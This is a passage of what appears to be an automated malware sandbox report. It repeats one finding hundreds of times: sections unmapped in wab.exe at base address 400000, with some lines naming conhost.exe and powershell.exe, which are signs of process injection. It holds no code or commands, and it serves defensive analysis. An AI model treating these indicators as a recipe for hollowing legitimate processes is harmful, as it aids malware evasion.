              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: C:\Windows\System32\conhost.exe base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
